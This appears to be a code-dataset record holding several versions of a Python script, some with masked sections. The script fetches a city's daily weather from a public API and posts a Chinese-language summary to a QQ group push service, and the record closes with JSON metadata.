try:
api = 'http://t.weather.itboy.net/api/weather/city/'
city_code = '101070201'
tqurl = api + city_code
response = requests.get(tqurl)
d = response.json()
print(d['status'])
if d['status'] == 200:
parent = d['cityInfo']['parent']
city = d['cityInfo']['city']
update_time = d['time']
date = d['data']['forecast'][0]['ymd']
week = d['data']['forecast'][0]['week']
weather_type = d['data']['forecast'][0]['type']
wendu_high = d['data']['forecast'][0]['high']
wendu_low = d['data']['forecast'][0]['low']
shidu = d['data']['shidu']
pm25 = str(d['data']['pm25'])
pm10 = str(d['data']['pm10'])
quality = d['data']['quality']
fx = d['data']['forecast'][0]['fx']
fl = d['data']['forecast'][0]['fl']
ganmao = d['data']['ganmao']
tips = d['data']['forecast'][0]['notice']
cpurl = 'https://push.xuthus.cc/group/' + key
tdwt = ('-----------------------------------------' +
'\n【今日份天气】\n城市: ' + parent + city + '\n日期: ' + date +
'\n星期: ' + week + '\n天气: ' + weather_type + '\n温度: ' +
wendu_high + ' / ' + wendu_low + '\n湿度: ' + shidu +
'\nPM25: ' + pm25 + '\nPM10: ' + pm10 + '\n空气质量: ' +
quality + '\n风力风向: ' + fx + fl + '\n感冒指数: ' + ganmao +
'\n温馨提示: ' + tips + '\n更新时间: ' + update_time)
print(tdwt)
requests.post(cpurl, tdwt.encode('utf-8'))
except:
error = '【出现错误】\n\u3000\u3000今日天气推送错误,请检查服务或网络状态!'
print(error)
def main_handler(event, context):
try:
main()
except Exception as e:
raise e
else:
return 'success'
if __name__ == '__main__':
print(main_handler({}, {}))
<|reserved_special_token_1|>
import requests
key = ''
def main():
try:
api = 'http://t.weather.itboy.net/api/weather/city/'
city_code = '101070201'
tqurl = api + city_code
response = requests.get(tqurl)
d = response.json()
print(d['status'])
if d['status'] == 200:
parent = d['cityInfo']['parent']
city = d['cityInfo']['city']
update_time = d['time']
date = d['data']['forecast'][0]['ymd']
week = d['data']['forecast'][0]['week']
weather_type = d['data']['forecast'][0]['type']
wendu_high = d['data']['forecast'][0]['high']
wendu_low = d['data']['forecast'][0]['low']
shidu = d['data']['shidu']
pm25 = str(d['data']['pm25'])
pm10 = str(d['data']['pm10'])
quality = d['data']['quality']
fx = d['data']['forecast'][0]['fx']
fl = d['data']['forecast'][0]['fl']
ganmao = d['data']['ganmao']
tips = d['data']['forecast'][0]['notice']
cpurl = 'https://push.xuthus.cc/group/' + key
tdwt = ('-----------------------------------------' +
'\n【今日份天气】\n城市: ' + parent + city + '\n日期: ' + date +
'\n星期: ' + week + '\n天气: ' + weather_type + '\n温度: ' +
wendu_high + ' / ' + wendu_low + '\n湿度: ' + shidu +
'\nPM25: ' + pm25 + '\nPM10: ' + pm10 + '\n空气质量: ' +
quality + '\n风力风向: ' + fx + fl + '\n感冒指数: ' + ganmao +
'\n温馨提示: ' + tips + '\n更新时间: ' + update_time)
print(tdwt)
requests.post(cpurl, tdwt.encode('utf-8'))
except:
error = '【出现错误】\n\u3000\u3000今日天气推送错误,请检查服务或网络状态!'
print(error)
def main_handler(event, context):
try:
main()
except Exception as e:
raise e
else:
return 'success'
if __name__ == '__main__':
print(main_handler({}, {}))
<|reserved_special_token_1|>
import requests
# qq推送 申请参考https://cp.xuthus.cc/
key = ''
def main():
try:
api = 'http://t.weather.itboy.net/api/weather/city/' # API地址,必须配合城市代码使用
city_code = '101070201' # 进入https://where.heweather.com/index.html查询你的城市代码
tqurl = api + city_code
response = requests.get(tqurl)
d = response.json() # 将数据以json形式返回,这个d就是返回的json数据
print(d['status'])
if (d['status'] == 200): # 当返回状态码为200,输出天气状况
parent = d["cityInfo"]["parent"] # 省
city = d["cityInfo"]["city"] # 市
update_time = d["time"] # 更新时间
date = d["data"]["forecast"][0]["ymd"] # 日期
week = d["data"]["forecast"][0]["week"] # 星期
weather_type = d["data"]["forecast"][0]["type"] # 天气
wendu_high = d["data"]["forecast"][0]["high"] # 最高温度
wendu_low = d["data"]["forecast"][0]["low"] # 最低温度
shidu = d["data"]["shidu"] # 湿度
pm25 = str(d["data"]["pm25"]) # PM2.5
pm10 = str(d["data"]["pm10"]) # PM10
quality = d["data"]["quality"] # 天气质量
fx = d["data"]["forecast"][0]["fx"] # 风向
fl = d["data"]["forecast"][0]["fl"] # 风力
ganmao = d["data"]["ganmao"] # 感冒指数
tips = d["data"]["forecast"][0]["notice"] # 温馨提示
cpurl = "https://push.xuthus.cc/group/" + key # 推送到QQ群
# cpurl = '[/font][/size][size=4][font=宋体][size=4][font=宋体]请求地址[/font][/size]/send/'+spkey #推送到个人QQ
# 天气提示内容
tdwt ="-----------------------------------------" + "\n【今日份天气】\n城市: " + parent + city + \
"\n日期: " + date + "\n星期: " + week + "\n天气: " + weather_type + "\n温度: " + wendu_high + " / " + wendu_low + "\n湿度: " + \
shidu + "\nPM25: " + pm25 + "\nPM10: " + pm10 + "\n空气质量: " + quality + \
"\n风力风向: " + fx + fl + "\n感冒指数: " + ganmao + "\n温馨提示: " + tips + "\n更新时间: " + update_time
print(tdwt)
requests.post(cpurl, tdwt.encode('utf-8')) # 把天气数据转换成UTF-8格式,不然要报错。
except:
error = '【出现错误】\n 今日天气推送错误,请检查服务或网络状态!'
print(error)
def main_handler(event, context):
try:
main()
except Exception as e:
raise e
else:
return 'success'
if __name__ == '__main__':
# print(extension)
print(main_handler({}, {}))
|
flexible
|
{
"blob_id": "4048d7bfc7922ef76d98d43e1ea266e732e0982e",
"index": 9111,
"step-1": "<mask token>\n\n\ndef main():\n try:\n api = 'http://t.weather.itboy.net/api/weather/city/'\n city_code = '101070201'\n tqurl = api + city_code\n response = requests.get(tqurl)\n d = response.json()\n print(d['status'])\n if d['status'] == 200:\n parent = d['cityInfo']['parent']\n city = d['cityInfo']['city']\n update_time = d['time']\n date = d['data']['forecast'][0]['ymd']\n week = d['data']['forecast'][0]['week']\n weather_type = d['data']['forecast'][0]['type']\n wendu_high = d['data']['forecast'][0]['high']\n wendu_low = d['data']['forecast'][0]['low']\n shidu = d['data']['shidu']\n pm25 = str(d['data']['pm25'])\n pm10 = str(d['data']['pm10'])\n quality = d['data']['quality']\n fx = d['data']['forecast'][0]['fx']\n fl = d['data']['forecast'][0]['fl']\n ganmao = d['data']['ganmao']\n tips = d['data']['forecast'][0]['notice']\n cpurl = 'https://push.xuthus.cc/group/' + key\n tdwt = ('-----------------------------------------' +\n '\\n【今日份天气】\\n城市: ' + parent + city + '\\n日期: ' + date +\n '\\n星期: ' + week + '\\n天气: ' + weather_type + '\\n温度: ' +\n wendu_high + ' / ' + wendu_low + '\\n湿度: ' + shidu +\n '\\nPM25: ' + pm25 + '\\nPM10: ' + pm10 + '\\n空气质量: ' +\n quality + '\\n风力风向: ' + fx + fl + '\\n感冒指数: ' + ganmao +\n '\\n温馨提示: ' + tips + '\\n更新时间: ' + update_time)\n print(tdwt)\n requests.post(cpurl, tdwt.encode('utf-8'))\n except:\n error = '【出现错误】\\n\\u3000\\u3000今日天气推送错误,请检查服务或网络状态!'\n print(error)\n\n\ndef main_handler(event, context):\n try:\n main()\n except Exception as e:\n raise e\n else:\n return 'success'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n try:\n api = 'http://t.weather.itboy.net/api/weather/city/'\n city_code = '101070201'\n tqurl = api + city_code\n response = requests.get(tqurl)\n d = response.json()\n print(d['status'])\n if d['status'] == 200:\n parent = d['cityInfo']['parent']\n city = d['cityInfo']['city']\n update_time = d['time']\n date = d['data']['forecast'][0]['ymd']\n week = d['data']['forecast'][0]['week']\n weather_type = d['data']['forecast'][0]['type']\n wendu_high = d['data']['forecast'][0]['high']\n wendu_low = d['data']['forecast'][0]['low']\n shidu = d['data']['shidu']\n pm25 = str(d['data']['pm25'])\n pm10 = str(d['data']['pm10'])\n quality = d['data']['quality']\n fx = d['data']['forecast'][0]['fx']\n fl = d['data']['forecast'][0]['fl']\n ganmao = d['data']['ganmao']\n tips = d['data']['forecast'][0]['notice']\n cpurl = 'https://push.xuthus.cc/group/' + key\n tdwt = ('-----------------------------------------' +\n '\\n【今日份天气】\\n城市: ' + parent + city + '\\n日期: ' + date +\n '\\n星期: ' + week + '\\n天气: ' + weather_type + '\\n温度: ' +\n wendu_high + ' / ' + wendu_low + '\\n湿度: ' + shidu +\n '\\nPM25: ' + pm25 + '\\nPM10: ' + pm10 + '\\n空气质量: ' +\n quality + '\\n风力风向: ' + fx + fl + '\\n感冒指数: ' + ganmao +\n '\\n温馨提示: ' + tips + '\\n更新时间: ' + update_time)\n print(tdwt)\n requests.post(cpurl, tdwt.encode('utf-8'))\n except:\n error = '【出现错误】\\n\\u3000\\u3000今日天气推送错误,请检查服务或网络状态!'\n print(error)\n\n\ndef main_handler(event, context):\n try:\n main()\n except Exception as e:\n raise e\n else:\n return 'success'\n\n\nif __name__ == '__main__':\n print(main_handler({}, {}))\n",
"step-3": "<mask token>\nkey = ''\n\n\ndef main():\n try:\n api = 'http://t.weather.itboy.net/api/weather/city/'\n city_code = '101070201'\n tqurl = api + city_code\n response = requests.get(tqurl)\n d = response.json()\n print(d['status'])\n if d['status'] == 200:\n parent = d['cityInfo']['parent']\n city = d['cityInfo']['city']\n update_time = d['time']\n date = d['data']['forecast'][0]['ymd']\n week = d['data']['forecast'][0]['week']\n weather_type = d['data']['forecast'][0]['type']\n wendu_high = d['data']['forecast'][0]['high']\n wendu_low = d['data']['forecast'][0]['low']\n shidu = d['data']['shidu']\n pm25 = str(d['data']['pm25'])\n pm10 = str(d['data']['pm10'])\n quality = d['data']['quality']\n fx = d['data']['forecast'][0]['fx']\n fl = d['data']['forecast'][0]['fl']\n ganmao = d['data']['ganmao']\n tips = d['data']['forecast'][0]['notice']\n cpurl = 'https://push.xuthus.cc/group/' + key\n tdwt = ('-----------------------------------------' +\n '\\n【今日份天气】\\n城市: ' + parent + city + '\\n日期: ' + date +\n '\\n星期: ' + week + '\\n天气: ' + weather_type + '\\n温度: ' +\n wendu_high + ' / ' + wendu_low + '\\n湿度: ' + shidu +\n '\\nPM25: ' + pm25 + '\\nPM10: ' + pm10 + '\\n空气质量: ' +\n quality + '\\n风力风向: ' + fx + fl + '\\n感冒指数: ' + ganmao +\n '\\n温馨提示: ' + tips + '\\n更新时间: ' + update_time)\n print(tdwt)\n requests.post(cpurl, tdwt.encode('utf-8'))\n except:\n error = '【出现错误】\\n\\u3000\\u3000今日天气推送错误,请检查服务或网络状态!'\n print(error)\n\n\ndef main_handler(event, context):\n try:\n main()\n except Exception as e:\n raise e\n else:\n return 'success'\n\n\nif __name__ == '__main__':\n print(main_handler({}, {}))\n",
"step-4": "import requests\nkey = ''\n\n\ndef main():\n try:\n api = 'http://t.weather.itboy.net/api/weather/city/'\n city_code = '101070201'\n tqurl = api + city_code\n response = requests.get(tqurl)\n d = response.json()\n print(d['status'])\n if d['status'] == 200:\n parent = d['cityInfo']['parent']\n city = d['cityInfo']['city']\n update_time = d['time']\n date = d['data']['forecast'][0]['ymd']\n week = d['data']['forecast'][0]['week']\n weather_type = d['data']['forecast'][0]['type']\n wendu_high = d['data']['forecast'][0]['high']\n wendu_low = d['data']['forecast'][0]['low']\n shidu = d['data']['shidu']\n pm25 = str(d['data']['pm25'])\n pm10 = str(d['data']['pm10'])\n quality = d['data']['quality']\n fx = d['data']['forecast'][0]['fx']\n fl = d['data']['forecast'][0]['fl']\n ganmao = d['data']['ganmao']\n tips = d['data']['forecast'][0]['notice']\n cpurl = 'https://push.xuthus.cc/group/' + key\n tdwt = ('-----------------------------------------' +\n '\\n【今日份天气】\\n城市: ' + parent + city + '\\n日期: ' + date +\n '\\n星期: ' + week + '\\n天气: ' + weather_type + '\\n温度: ' +\n wendu_high + ' / ' + wendu_low + '\\n湿度: ' + shidu +\n '\\nPM25: ' + pm25 + '\\nPM10: ' + pm10 + '\\n空气质量: ' +\n quality + '\\n风力风向: ' + fx + fl + '\\n感冒指数: ' + ganmao +\n '\\n温馨提示: ' + tips + '\\n更新时间: ' + update_time)\n print(tdwt)\n requests.post(cpurl, tdwt.encode('utf-8'))\n except:\n error = '【出现错误】\\n\\u3000\\u3000今日天气推送错误,请检查服务或网络状态!'\n print(error)\n\n\ndef main_handler(event, context):\n try:\n main()\n except Exception as e:\n raise e\n else:\n return 'success'\n\n\nif __name__ == '__main__':\n print(main_handler({}, {}))\n",
"step-5": "\nimport requests\n# qq推送 申请参考https://cp.xuthus.cc/\nkey = ''\ndef main():\n try:\n api = 'http://t.weather.itboy.net/api/weather/city/' # API地址,必须配合城市代码使用\n city_code = '101070201' # 进入https://where.heweather.com/index.html查询你的城市代码\n tqurl = api + city_code\n response = requests.get(tqurl)\n d = response.json() # 将数据以json形式返回,这个d就是返回的json数据\n print(d['status'])\n if (d['status'] == 200): # 当返回状态码为200,输出天气状况\n parent = d[\"cityInfo\"][\"parent\"] # 省\n city = d[\"cityInfo\"][\"city\"] # 市\n update_time = d[\"time\"] # 更新时间\n date = d[\"data\"][\"forecast\"][0][\"ymd\"] # 日期\n week = d[\"data\"][\"forecast\"][0][\"week\"] # 星期\n weather_type = d[\"data\"][\"forecast\"][0][\"type\"] # 天气\n wendu_high = d[\"data\"][\"forecast\"][0][\"high\"] # 最高温度\n wendu_low = d[\"data\"][\"forecast\"][0][\"low\"] # 最低温度\n shidu = d[\"data\"][\"shidu\"] # 湿度\n pm25 = str(d[\"data\"][\"pm25\"]) # PM2.5\n pm10 = str(d[\"data\"][\"pm10\"]) # PM10\n quality = d[\"data\"][\"quality\"] # 天气质量\n fx = d[\"data\"][\"forecast\"][0][\"fx\"] # 风向\n fl = d[\"data\"][\"forecast\"][0][\"fl\"] # 风力\n ganmao = d[\"data\"][\"ganmao\"] # 感冒指数\n tips = d[\"data\"][\"forecast\"][0][\"notice\"] # 温馨提示\n cpurl = \"https://push.xuthus.cc/group/\" + key # 推送到QQ群\n # cpurl = '[/font][/size][size=4][font=宋体][size=4][font=宋体]请求地址[/font][/size]/send/'+spkey #推送到个人QQ\n # 天气提示内容\n tdwt =\"-----------------------------------------\" + \"\\n【今日份天气】\\n城市: \" + parent + city + \\\n \"\\n日期: \" + date + \"\\n星期: \" + week + \"\\n天气: \" + weather_type + \"\\n温度: \" + wendu_high + \" / \" + wendu_low + \"\\n湿度: \" + \\\n shidu + \"\\nPM25: \" + pm25 + \"\\nPM10: \" + pm10 + \"\\n空气质量: \" + quality + \\\n \"\\n风力风向: \" + fx + fl + \"\\n感冒指数: \" + ganmao + \"\\n温馨提示: \" + tips + \"\\n更新时间: \" + update_time\n print(tdwt)\n requests.post(cpurl, tdwt.encode('utf-8')) # 把天气数据转换成UTF-8格式,不然要报错。\n except:\n error = '【出现错误】\\n 今日天气推送错误,请检查服务或网络状态!'\n print(error)\n\ndef main_handler(event, context):\n try:\n main()\n except Exception as e:\n raise e\n else:\n return 'success'\n\nif __name__ == '__main__':\n # print(extension)\n print(main_handler({}, {}))",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.